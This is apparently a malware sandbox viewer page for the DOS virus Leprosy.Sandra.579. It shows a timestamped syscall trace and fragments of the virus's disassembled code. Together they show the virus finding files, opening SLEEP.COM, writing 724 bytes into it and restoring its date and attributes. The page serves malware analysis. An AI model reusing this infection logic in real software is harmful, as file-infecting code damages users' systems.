Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Sandra.579

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:28.497963259Z 44 PC: 12b4b | Get time 0x12b4b: cmp byte ptr [0x107], 0
0x12b50: je 0x12b52
0x12b52: cmp dl, 0
0x12b55: je 0x12b47
0x12b57: mov byte ptr [0x107], dl
0x12b5b: mov byte ptr [0x17a], 0
0x12b60: mov byte ptr [0x17b], 1
0x12b65: mov byte ptr [0x184], 0
0x12b6a: mov cx, 0x27
0x12b6d: mov dx, 0x157
0x12b70: mov ah, 0x4e
0x12b72: int 0x21
0x12b74: cmp ax, 0x12
0x12b77: je 0x12b7c
0x12b79: call 0x12b9e
0x12b7c: mov cx, 0x27
0x12b7f: mov dx, 0x15d
0x12b82: mov ah, 0x4e
0x12b84: int 0x21
0x12b86: cmp ax, 0x12
2018-12-17T23:01:28.500856395Z 78 PC: 12b74 | Find first file
2018-12-17T23:01:28.508578715Z 78 PC: 12b86 | Find first file
2018-12-17T23:01:28.516695187Z 67 PC: 12bbf | Get or set file attributes
2018-12-17T23:01:28.538382979Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:28.546665642Z 63 PC: 12bd4 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T23:01:28.553507097Z 62 PC: 12c08 | Close file
2018-12-17T23:01:28.555540769Z 61 PC: 12c11 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:28.566915051Z 44 PC: 12a5a | Get time 0x12a5a: nop
0x12a5b: xor dh, dh
0x12a5d: sti
0x12a5e: rcr dl, 1
0x12a60: rcr dl, 1
0x12a62: mov cx, 0x243
0x12a65: add cx, dx
0x12a67: sti
0x12a68: mov ah, 0x20
0x12a6a: nop
0x12a6b: add ah, 0x20
0x12a6e: cli
0x12a6f: mov dx, 0x100
0x12a72: cli
0x12a73: int 0x21
0x12a75: nop
0x12a76: call 0x12a7b
0x12a79: nop
0x12a7a: ret
0x12a7b: cli
2018-12-17T23:01:28.570126525Z 64 PC: 12a75 | Write file or device (Write 724 bytes on handle 5)
2018-12-17T23:01:28.579538852Z 87 PC: 12c39 | Get or set file date and time
2018-12-17T23:01:28.581779753Z 62 PC: 12c41 | Close file
2018-12-17T23:01:28.590690276Z 67 PC: 12c4e | Get or set file attributes